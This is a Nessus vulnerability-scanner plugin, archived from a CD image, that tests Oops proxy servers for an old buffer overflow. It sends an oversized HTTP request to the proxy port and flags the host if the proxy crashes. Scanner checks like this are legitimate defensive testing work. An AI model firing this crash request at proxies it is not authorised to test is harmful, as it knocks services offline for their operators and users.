home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / oops_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  93 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Should also cover http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0082.html
  7. #
  8.  
  9. if(description)
  10. {
  11.  script_id(10578);
  12.  script_bugtraq_id(2099);
  13.  script_cve_id("CAN-2001-0029");
  14.  script_version ("$Revision: 1.13 $");
  15.  
  16.  name["english"] = "Oops buffer overflow";
  17.  name["francais"] = "DΘpassement de buffer dans Oops";
  18.  script_name(english:name["english"], francais:name["francais"]);
  19.  
  20.  desc["english"] = "
  21. The remote proxy server seems to be ooops 1.4.6 or older.
  22.  
  23. This proxy is vulnerable to a buffer overflow that
  24. allows an attacker to gain a shell on this host.
  25.  
  26. *** Note that this check made the remote proxy crash
  27.  
  28. Solution : Upgrade to the latest version of this software
  29. Risk factor : High";
  30.  
  31.     
  32.  desc["francais"] = "
  33. Le serveur proxy distant semble etre oops 1.4.6 ou plus
  34. ancien.
  35.  
  36. Ce proxy est vulnΘrable α une attaque qui permet α un
  37. pirate d'obtenir un shell sur ce systΦme.
  38.  
  39. *** Notez que ce test de sΘcuritΘ a tuΘ le proxy
  40.  
  41. Solution : Mettez ce proxy α jour en sa derniΦre version
  42. Facteur de risque : ElevΘ";
  43.  
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Overflows oops";
  48.  summary["francais"] = "DΘpassement de buffer dans oops";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_DESTRUCTIVE_ATTACK);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  56.  family["english"] = "Gain a shell remotely";
  57.  family["francais"] = "Obtenir un shell α distance";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencie("find_service.nes");
  60.  script_require_ports("Services/http_proxy", 3128);
  61.  exit(0);
  62. }
  63.  
  64.  
  65. include("http_func.inc");
  66.  
  67. port = get_kb_item("Services/http_proxy");
  68. if(!port) port = 3128;
  69.  
  70.  
  71. if(get_port_state(port))
  72. {
  73.  soc = http_open_socket(port);
  74.  if(soc)
  75.  {
  76.   req = http_get(item:string("http://", crap(12)), port:port);
  77.   send(socket:soc, data:req);
  78.   r = http_recv(socket:soc);
  79.   if ( ! r ) exit(0);
  80.   close(soc);
  81.  
  82.   soc = http_open_socket(port);
  83.   if ( ! soc ) exit(0);
  84.  
  85.   req = http_get(item:string("http://", crap(1200)), port:port);
  86.   send(socket:soc, data:req);
  87.   r = http_recv(socket:soc); 
  88.   http_close_socket(soc); 
  89.  
  90.   if(http_is_dead(port:port))security_hole(port);
  91.  }
  92. }
  93.